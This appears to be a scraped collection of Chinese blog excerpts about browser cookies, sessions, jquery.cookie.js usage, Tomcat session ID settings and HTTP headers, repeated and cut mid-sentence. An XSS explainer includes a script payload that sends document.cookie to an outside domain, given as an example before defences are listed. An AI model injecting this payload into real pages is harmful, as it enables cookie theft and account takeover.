cookie

因为因特网HTTP协议的特性，每一次来自于用户浏览器的请求（request）都是无状态的、独立的。通俗地说，就是无法保存用户状态，后台服务器根本就不知道当前请求和以前及以后请求是否来自同一用户。对于静态网站，这可能不是个问题，而对于动态网站，尤其是京东、天猫、银行等购物或金融网站，无法识别用户并保持用户状态是致命的，根本就无法提供服务。可以尝试将浏览器的cookie功能关闭，会发现将无法在京东登录和购物。 为了保持连接状态，网站会通过用户的浏览器在用户机器内被限定的硬盘位置中写入一些数据，也就是所谓的Cookie。通过Cookie可以保存一些诸如用户名、浏览记录、表单记录、登录和注销等各种数据。但是这种方式非常不安全，因为Cookie保存在用户的机器上，如果Cookie被伪造、篡改或删除，就会造成极大的安全威胁，因此，现代网站设计通常将Cookie用来保存一些不重要的内容，实际的用户数据和状态还是以Session会话的方式保存在服务器端。 Session就是在服务器端的‘Cookie’，将用户数据保存在服务器端，远比保存在用户端要安全、方便和快捷得多。 Session依赖Cookie！但与Cookie不同的地方在于Session将所有的数据都放在服务器端，用户浏览器的Cookie中只会保存一个非明文的识别信息，比如哈希值。 Session是大多数网站都需要具备的功能

下载与引入:jquery.cookie.js基于jquery；先引入jquery，再引入：jquery.cookie.js；下载 https://files.cnblogs.com/files/chuanyueinlife/jquery.cookie.js 1 <script type="text/javascript" src="js/jquery.min.js"></script> 2 <script type="text/javascript" src="js/jquery.cookie.js"></script> 使用： 1.添加一个"会话cookie" $.cookie('the_cookie', 'the_value'); 这里没有指明 cookie有效时间，所创建的cookie有效期默认到用户关闭浏览器为止，所以被称为 “会话cookie（session cookie）”。 2.创建一个cookie并设置有效时间为 7天 $.cookie('the_cookie', 'the_value', { expires: 7 }); 这里指明了cookie有效时间，所创建的cookie被称为“持久 cookie （persistent cookie）”。注意单位是：天； 3.创建一个cookie并设置 cookie的有效路径 $.cookie('the_cookie',

jquery.cookie 使用方法 一个轻量级的 cookie 插件，可以读取、写入、删除 cookie 。 jquery.cookie.js 的配置 首先包含 jQuery 的库文件，在后面包含 jquery.cookie.js 的库文件。 <script type="text/javascript" src="js/jquery-1.6.2.min.js"></script> <script type="text/javascript" src="js/jquery.cookie.js"></script> 使用方法 新添加一个会话 cookie ： $.cookie('the_cookie', 'the_value'); 注：当没有指明 cookie 有效时间时，所创建的 cookie 有效期默认到用户关闭浏览器为止，所以被称为 “会话 cookie （ session cookie ）”。 创建一个 cookie 并设置有效时间为 7 天 : $.cookie('the_cookie', 'the_value', { expires: 7 }); 注： 当指明了 cookie 有效时间时， 所创建的 cookie 被称为 “持久 cookie （ persistent cookie ） ” 。 创建一个 cookie 并设置 cookie 的有效路径： $.cookie(

一个轻量级的cookie 插件，可以读取、写入、删除 cookie。 jquery.cookie.js 的配置 首先包含jQuery的库文件，在后面包含 jquery.cookie.js 的库文件。 <script type="text/javascript" src="js/jquery-1.6.2.min.js"></script> <script type="text/javascript" src="js/jquery.cookie.js"></script> 使用方法 1.新添加一个会话 cookie： $.cookie('the_cookie', 'the_value'); 注：当没有指明 cookie有效时间时，所创建的cookie有效期默认到用户关闭浏览器为止，所以被称为 “会话cookie（session cookie）”。 2.创建一个cookie并设置有效时间为 7天: $.cookie('the_cookie', 'the_value', { expires: 7 }); 注：当指明了cookie有效时间时，所创建的cookie被称为“持久 cookie （persistent cookie）”。 3.创建一个cookie并设置 cookie的有效路径： $.cookie('the_cookie', 'the_value', { expires: 7,

一定要写入cookies路径 一个轻量级的cookie 插件，可以读取、写入、删除 cookie。 jquery.cookie.js 的配置 首先包含jQuery的库文件，在后面包含 jquery.cookie.js 的库文件。 <script type="text/javascript" src="js/jquery-1.6.2.min.js"></script> <script type="text/javascript" src="js/jquery.cookie.js"></script> 使用方法 1.新添加一个会话 cookie： $.cookie('the_cookie', 'the_value'); 注：当没有指明 cookie有效时间时，所创建的cookie有效期默认到用户关闭浏览器为止，所以被称为 “会话cookie（session cookie）”。 2.创建一个cookie并设置有效时间为 7天: $.cookie('the_cookie', 'the_value', { expires: 7 }); 注：当指明了cookie有效时间时，所创建的cookie被称为“持久 cookie （persistent cookie）”。 3.创建一个cookie并设置 cookie的有效路径： $.cookie('the_cookie', 'the_value', {

一个轻量级的cookie 插件，可以读取、写入、删除 cookie。 jquery.cookie.js 的配置 首先包含jQuery的库文件，在后面包含 jquery.cookie.js 的库文件。 <script type="text/javascript" src="js/jquery-1.6.2.min.js"></script> <script type="text/javascript" src="js/jquery.cookie.js"></script> 使用方法 1.新添加一个会话 cookie： $.cookie('the_cookie', 'the_value'); 注：当没有指明 cookie有效时间时，所创建的cookie有效期默认到用户关闭浏览器为止，所以被称为 “会话cookie（session cookie）”。 2.创建一个cookie并设置有效时间为 7天: $.cookie('the_cookie', 'the_value', { expires: 7 }); 注：当指明了cookie有效时间时，所创建的cookie被称为“持久 cookie （persistent cookie）”。 3.创建一个cookie并设置 cookie的有效路径： $.cookie('the_cookie', 'the_value', { expires: 7,

黑客通常在用这 4 种方式攻击你！（内附防御策略） XSS 利用的是用户对指定网站的信任，CSRF 利用的是网站对用户浏览器的信任。https://www.cnblogs.com/chengxy-nds/p/12217990.html 一、跨站脚本攻击 概念 跨站脚本攻击（Cross-Site Scripting, XSS），可以将代码注入到用户浏览的网页上，这种代码包括 HTML 和 JavaScript。 攻击原理 例如有一个论坛网站，攻击者可以在上面发布以下内容： <script>location.href="//domain.com/?c=" + document.cookie</script> 之后该内容可能会被渲染成以下形式： <p><script>location.href="//domain.com/?c=" + document.cookie</script></p> 另一个用户浏览了含有这个内容的页面将会跳转到 domain.com 并携带了当前作用域的 Cookie。如果这个论坛网站通过 Cookie 管理用户登录状态，那么攻击者就可以通过这个 Cookie 登录被攻击者的账号了。 危害 窃取用户的 Cookie 伪造虚假的输入表单骗取个人信息 显示伪造的文章或者图片 防范手段 1. 设置 Cookie 为 HttpOnly 设置了 HttpOnly 的

代码地址如下： http://www.demodashi.com/demo/12713.html Cookie的由来 首先我们需要介绍一下，在Web开发过程中为什么会引入Cookie。我们知道Http协议是一种无状态协议， Web服务器本身不能识别出哪些请求是同一个浏览器发出的，浏览器的每一次请求都是完全孤立的。 即便在Http1.1支持了持续连接，但当用户有一段时间没有提交请求时，连接也会自动关闭。这时，作为Web服务器， 必须采用一种机制来唯一标识一个用户，同时记录该用户的状态。于是就引入了第一种机制:Cookie机制。 Cookie机制: 采用的是在客户端保持Http状态的方案。 Cookie的定义即基本介绍 Cookie是在浏览器访问WEB服务器的某个资源时， 由WEB服务器在HTTP响应消息头中附带传送给浏览器的一个小文本文件。 一旦WEB浏览器保存了某个Cookie， 那么它在以后每次访问该WEB服务器时， 都会在HTTP请求头中将这个Cookie回传给WEB服务器。 一个Cookie只能标识一种信息， 它至少含有一个标识该信息的名称（NAME）和设置值（VALUE）。 一个WEB站点可以给一个WEB浏览器发送多个Cookie， 一个WEB浏览器也可以存储多个WEB站点提供的Cookie。 浏览器一般只允许存放300个Cookie， 每个站点最多存放20个Cookie

保护你的会话令牌 通常我们会采取以下的措施来保护会话。 1．采用强算法生成Session ID 正如我们前面用Web Scrab分析的那样，会话ID必须具有随机性和不可预测性。一般来说，会话ID的长度至少为128位。下面我们就拿常见的应用服务器Tomcat来说明如何配置会话ID的长度和生成算法。 首先我们找到{TOMCAT_HOME}\conf\context.xml，然后加入下面一段设置 <Manager sessionIdLength="20" ➊ secureRandomAlgorithm="SHA1PRNG" ➋ secureRandomClass="java.security.SecureRandom" ➌ /> ➊ 定义会话ID 的长度，如果我们这里不声明的话，默认是16字节。可能有读者会纳闷，怎么平时我看到的会话ID都是很长的呀？我们就拿这里的20个字节来讲吧，我们在浏览器发送请求时会发现这样的会话ID： JSESSIONID=90503B6BE403D4AB6164A311E167CF1F6F3F2BD0 仔细看会发现ID的长度为40，因为这里显示的是十六进制，每两个字符代表一个字节。 ➋ 定义随机数算法，默认的是SHA1PRNG，你也可以换成自己的算法。 ➌ 定义随机数类，默认的是java.security.SecureRandom

6. HTTP协议的请求和响应报文中必定包含HTTP首部。 首部内容为客户端和服务器分别处理请求和响应提供所需要的信息。 报文首部由几个字段构成。 HTTP请求报文： 在请求报文中，HTTP报文由方法、URI、HTTP版本、HTTP首部字段等部分构成。 HTTP响应报文： 在响应中，HTTP报文由HTTP版本、状态码（数字和原因短语）、HTTP首部字段3部分构成。 HTTP首部字段： HTTP首部字段是构成HTTP报文的要素之一。在客户端与服务器之间以HTTP协议进行通信的过程中，无论是请求还是响应都会使用首部字段，它能起到传递额外重要信息的作用。 使用首部字段是为了给浏览器和服务器提供报文主体大小、所使用的语言、认证信息等内容。 HTTP首部字段结构： HTTP首部字段是由首部字段名和字段值构成的，中间用冒号“：”分隔。 　　 首部字段名：字段值　　如Content-Type：text/html 字段值对应单个HTTP首部字段可以有多个值，如：Keep-Alive：timeout=15,max=100 HTTP首部字段重复时为规范，由浏览器决定。 4种HTTP首部字段类型： HTTP首部字段根据实际用途被分为以下4种类型。 通用首部字段：请求报文和响应报文两方都会使用的首部。 请求首部字段：从客户端向服务端发送请求报文时使用的首部。补充了附加信息、客户端信息